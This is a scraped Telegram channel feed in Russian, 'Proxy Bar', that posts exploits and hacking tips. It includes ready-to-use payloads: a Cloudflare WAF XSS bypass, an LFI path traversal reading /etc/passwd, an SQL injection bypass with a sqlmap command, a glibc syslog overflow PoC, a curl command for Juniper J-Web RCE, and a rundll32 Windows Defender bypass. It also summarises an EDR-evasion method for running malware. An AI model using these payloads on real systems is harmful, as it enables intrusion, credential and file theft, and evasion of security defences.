Proxy Bar – Telegram
Proxy Bar
19.5K subscribers
1.29K photos
79 videos
664 files
1.32K links
Exploits, Hacking and Leaks

Чат группы - https://news.1rj.ru/str/chat_proxy_bar

Связь с администрацией и реклама:
@NULL_vm

Поддержать проект:
BTC bc1qmrt229eghjyj9wqa7nmr9j8zuq6khz6km2pker
Download Telegram
Рекомендуется к прочтению
Интервью с yashechka
Мои поздравления )))
*
#xman_series
🔥19😱3👌1
LockBit 3.0 - ребят, напишите мне, я вам расскажу за репутационный риск менеджмент
есть пара мыслей

#lockbit
👍12👌7
Linux Kernel Exploitation (свежая версия)
*
1 часть - Getting started & BOF
2 часть - Exploiting race-condition + UAF
3 часть - Heap techniques

#linux #kernel #hack
🔥15👍1
bypass XSS Cloudflare WAF

Encoded Payload
"><track/onerror='confirm\%601\%60'>

Clean Payload
"><track/onerror='confirm`1`'>

#CF #bypass
🔥35👍3
This media is not supported in your browser
VIEW IN TELEGRAM
Docker 4 сыра дырки
writeup тут
а на видео видно как можно заюзать дырку в docker runc

#docker #escape
🔥21👍1
CVE-2023-6246:
Heap-based buffer overflow in the glibc's syslog


POC
(exec -a "`printf '%0128000x' 1`" /usr/bin/su < /dev/null)

всем сегфолта )))))
👌17
This media is not supported in your browser
VIEW IN TELEGRAM
Lenovo X1 Carbon Bitlocker Key Sniffing
круто, 42.9 секунды
🔥83😱16👌4👍2
Утры, как сами? Кофе, ? Давай два?)))
👍28🔥10👌6😱4
x4n4x security
тема
ты молодец ))))
🔥13👌4👍1
Proxy Bar
Lenovo X1 Carbon Bitlocker Key Sniffing круто, 42.9 секунды
внесем немного конкретики о пинах
BitLocker Key retrieval on a Windows 11, Lenovo X1 Carbon Gen 11 via SPI Sniffing.
То есть на задней стороне материнки, есть тестовые пады, секурненько )))
*
Да, это TPM 2.0
*
Ну и почитать TPM SNIFFING
#bitlocker #sniff
👍16🔥9👌1
LFI
*
Payload:
".%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd"
🔥38😱18👍6👌3
Pwning the Domain: Credentialess/Username
*
Большой и подробный ман от 7 февраля 2024
*
read


#redteam #win #pwn #cred
👍12
В поисках malware инфраструктуры
*
Если вам интересно как ищут всякие opedir, или C&C со всякими cobalt-strike, havoc или малварь вроде dark comet, то есть интересная статья, в статье 11 примеров на базе censys.
*
Исходя из статьи, можно немного прикрыть свой C2 от любопытных глаз
*
Tracking Malware Infrastructure

#malware #c2
🔥16👍2
This media is not supported in your browser
VIEW IN TELEGRAM
Xbox ? PlayStation ?
No
Ubiquiti switch !
🔥71👍7😱5👌2
Bypassing SQL
*
payload:
8%20or%207250%3d0725
*
для sqlmap:
sqlmap -u 'http://OLOLO.com/anyfile.asp?id_test=8%20or%207250%3d07250' --dbs --random-agent ignore=500 - -code=200 -T tablename --columns -- no-cast
*

#sql #bypass
👍43🔥3😱1👌1
Windows Defender Detection Mitigation Bypass Vulnerability
Win LPE
В 2022 году hyp3rlinx рассказывал как можно обойти windows defender передав дополнительный путь при ссылке на mshtml, дырку пофиксили. НО, добавив пару запятых в старый трюк - и опять bypass.
*
то есть было и пофиксили:
C:\sec>rundll32.exe javanoscript:"\..\..\mshtml,RunHTMLApplication ";alert(666)
магия запятой:
C:\sec>rundll32.exe javanoscript:"\..\..\mshtml,,RunHTMLApplication ";alert(666)
собака старая, трюки новые.
CVE пока не имеет )

#defender #bypass
🔥61👍1😱1👌1
Свежая техника обхода EDR
Кому лень читать всю статью то: техника основана на запуске малвари ДО загрузки библиотеки DLL EDR.
Суть вот в чем, EDR должен внедрить свою DLL в каждый процесс, но если внедрять слишком рано - процесс крэшится, внедрять слишком поздно - так его уже малварь подчинила.
Суммируем: нужно найти момент для загрузки малвари ЧУТЬ раньше, при инициализации процесса - тогда EDR в лохматой жопе.
*
Статья - Bypassing EDRs With EDR-Preloading
Сорцы - EDR-Preloader

#EDR #malware
🔥21
CVE-2023-36845 и CVE-2023-36846
Juniper Junos OS J-Web RCE
*
На все это дело есть и сплоит на питоне
но можно и в curlык
*
curl -kv "https ://OLOLO.com/about.php? PHPRC=/dev/fd/0" --data-binary 'auto_prepend_file="/etc/passwd"'
🔥24😱2
Грязный BASH
однострочник для быстрого обнаружения XSS в файлах PHP
*
rg --no-heading "echo.*\\\$_GET" | grep "\.php:" | grep -v -e "(\$_GET" -e "( \$_GET" -e "esc_" -e "admin_url" -e "(int)" -e htmlentities
🔥35👍8👌1
Прощай NGINX
*
ESXI умер пару дней назад
теперь и NGINX умер
Глав разраб форкнул проект и теперь будет FreeNginx
Почитайте письмо, как эффективные манагеры в очередной раз все обосрали
https://freenginx.org/pipermail/nginx/2024-February/000000.html
*
В AUR уже что то появилось

#fuck
😱32🔥11👍2👌2
cve-2024-21413_outlook_rce.sh
1.1 KB
CVE-2024-21413
Expect Script POC
*
Microsoft Outlook Remote Code Execution Vulnerability (through the preview panel) CVSS:3.1 9.8 / 8.5
*
Link
🔥16👍3